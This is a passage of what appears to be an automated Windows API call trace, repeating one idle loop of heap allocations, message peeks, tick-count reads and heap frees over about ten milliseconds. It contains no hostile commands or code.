(HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.587] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.587] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.587] CoFreeUnusedLibraries () [0066.587] GetTickCount () returned 0x1d2c8 [0066.587] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.587] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.587] GetTickCount () returned 0x1d2c8 [0066.587] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.587] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.587] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.587] CoFreeUnusedLibraries () [0066.587] GetTickCount () returned 0x1d2c8 [0066.587] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.587] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.587] GetTickCount () returned 0x1d2c8 [0066.587] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.587] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.588] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.588] CoFreeUnusedLibraries () [0066.588] GetTickCount () returned 0x1d2c8 [0066.588] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.588] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.588] GetTickCount () returned 0x1d2c8 [0066.588] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.588] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.588] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.588] CoFreeUnusedLibraries () [0066.588] GetTickCount () returned 0x1d2c8 [0066.588] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.588] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.588] GetTickCount () returned 0x1d2c8 [0066.588] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.588] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.588] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.588] CoFreeUnusedLibraries () [0066.588] GetTickCount () returned 0x1d2c8 [0066.588] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.588] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.588] GetTickCount () returned 0x1d2c8 [0066.588] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.588] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.588] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.588] CoFreeUnusedLibraries () [0066.588] GetTickCount () returned 0x1d2c8 [0066.589] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.589] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.589] GetTickCount () returned 0x1d2c8 [0066.589] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.589] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.589] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.589] CoFreeUnusedLibraries () [0066.589] GetTickCount () returned 0x1d2c8 [0066.589] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.589] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.589] GetTickCount () returned 0x1d2c8 [0066.589] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.589] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.589] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.589] CoFreeUnusedLibraries () [0066.589] GetTickCount () returned 0x1d2c8 [0066.589] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.589] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.589] GetTickCount () returned 0x1d2c8 [0066.589] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.589] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.589] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.589] CoFreeUnusedLibraries () [0066.589] GetTickCount () returned 0x1d2c8 [0066.589] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.589] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.589] GetTickCount () returned 0x1d2c8 [0066.590] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.590] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.590] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.590] CoFreeUnusedLibraries () [0066.590] GetTickCount () returned 0x1d2c8 [0066.590] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.590] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.590] GetTickCount () returned 0x1d2c8 [0066.590] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.590] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.590] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.590] CoFreeUnusedLibraries () [0066.590] GetTickCount () returned 0x1d2c8 [0066.590] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.590] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.590] GetTickCount () returned 0x1d2c8 [0066.590] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.590] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.590] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.590] CoFreeUnusedLibraries () [0066.590] GetTickCount () returned 0x1d2c8 [0066.590] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.590] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.590] GetTickCount () returned 0x1d2c8 [0066.590] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.590] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.591] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.591] CoFreeUnusedLibraries () [0066.591] GetTickCount () returned 0x1d2c8 [0066.591] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.591] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.591] GetTickCount () returned 0x1d2c8 [0066.591] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.591] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.591] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.591] CoFreeUnusedLibraries () [0066.591] GetTickCount () returned 0x1d2c8 [0066.591] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.591] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.591] GetTickCount () returned 0x1d2c8 [0066.591] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.591] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.591] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.591] CoFreeUnusedLibraries () [0066.591] GetTickCount () returned 0x1d2c8 [0066.591] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.591] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.591] GetTickCount () returned 0x1d2c8 [0066.591] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.591] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.591] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.591] CoFreeUnusedLibraries () [0066.591] GetTickCount () returned 0x1d2c8 [0066.591] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.592] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.592] GetTickCount () returned 0x1d2c8 [0066.592] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.592] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.592] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.592] CoFreeUnusedLibraries () [0066.592] GetTickCount () returned 0x1d2c8 [0066.592] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.592] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.592] GetTickCount () returned 0x1d2c8 [0066.592] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.592] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.592] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.592] CoFreeUnusedLibraries () [0066.592] GetTickCount () returned 0x1d2c8 [0066.592] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.592] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.592] GetTickCount () returned 0x1d2c8 [0066.592] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.592] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.592] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.592] CoFreeUnusedLibraries () [0066.592] GetTickCount () returned 0x1d2c8 [0066.592] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.592] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.592] GetTickCount () returned 0x1d2c8 [0066.593] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.593] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.593] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.593] CoFreeUnusedLibraries () [0066.593] GetTickCount () returned 0x1d2c8 [0066.593] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.593] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.593] GetTickCount () returned 0x1d2c8 [0066.593] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.593] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.593] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.593] CoFreeUnusedLibraries () [0066.593] GetTickCount () returned 0x1d2c8 [0066.593] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.593] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.593] GetTickCount () returned 0x1d2c8 [0066.593] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.593] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.593] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.593] CoFreeUnusedLibraries () [0066.593] GetTickCount () returned 0x1d2c8 [0066.593] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.593] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.594] GetTickCount () returned 0x1d2d8 [0066.594] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.594] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.594] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.594] CoFreeUnusedLibraries () [0066.594] GetTickCount () returned 0x1d2d8 [0066.594] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.594] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.594] GetTickCount () returned 0x1d2d8 [0066.594] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.594] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.594] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.594] CoFreeUnusedLibraries () [0066.594] GetTickCount () returned 0x1d2d8 [0066.594] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.594] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.594] GetTickCount () returned 0x1d2d8 [0066.594] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.594] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.594] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.594] CoFreeUnusedLibraries () [0066.594] GetTickCount () returned 0x1d2d8 [0066.595] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.595] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.595] GetTickCount () returned 0x1d2d8 [0066.595] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.595] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.595] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.595] CoFreeUnusedLibraries () [0066.595] GetTickCount () returned 0x1d2d8 [0066.595] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.595] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.595] GetTickCount () returned 0x1d2d8 [0066.595] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.595] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.595] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.595] CoFreeUnusedLibraries () [0066.595] GetTickCount () returned 0x1d2d8 [0066.595] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.595] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.595] GetTickCount () returned 0x1d2d8 [0066.595] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.595] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.595] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.595] CoFreeUnusedLibraries () [0066.595] GetTickCount () returned 0x1d2d8 [0066.595] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.595] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.595] GetTickCount () returned 0x1d2d8 [0066.596] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.596] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.596] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.596] CoFreeUnusedLibraries () [0066.596] GetTickCount () returned 0x1d2d8 [0066.596] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.596] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.596] GetTickCount () returned 0x1d2d8 [0066.596] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.596] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.596] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.596] CoFreeUnusedLibraries () [0066.596] GetTickCount () returned 0x1d2d8 [0066.596] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.596] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.596] GetTickCount () returned 0x1d2d8 [0066.596] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.596] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.596] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.596] CoFreeUnusedLibraries () [0066.596] GetTickCount () returned 0x1d2d8 [0066.596] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.596] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.596] GetTickCount () returned 0x1d2d8 [0066.596] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.596] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.597] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.597] CoFreeUnusedLibraries () [0066.597] GetTickCount () returned 0x1d2d8 [0066.597] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.597] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.597] GetTickCount () returned 0x1d2d8 [0066.597] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.597] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.597] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.597] CoFreeUnusedLibraries () [0066.597] GetTickCount () returned 0x1d2d8 [0066.597] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.597] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.597] GetTickCount () returned 0x1d2d8 [0066.597] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.597] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.597] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.597] CoFreeUnusedLibraries () [0066.597] GetTickCount () returned 0x1d2d8 [0066.597] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.597] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.597] GetTickCount () returned 0x1d2d8 [0066.597] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.597] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.597] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.597] CoFreeUnusedLibraries () [0066.597] GetTickCount () returned 0x1d2d8 [0066.598] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.598] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.598] GetTickCount () returned 0x1d2d8 [0066.598] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.598] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.598] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.598] CoFreeUnusedLibraries () [0066.598] GetTickCount () returned 0x1d2d8 [0066.598] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.598] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.598] GetTickCount () returned 0x1d2d8 [0066.598] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.598] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.598] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.598] CoFreeUnusedLibraries () [0066.598] GetTickCount () returned 0x1d2d8 [0066.598] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.598] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.598] GetTickCount () returned 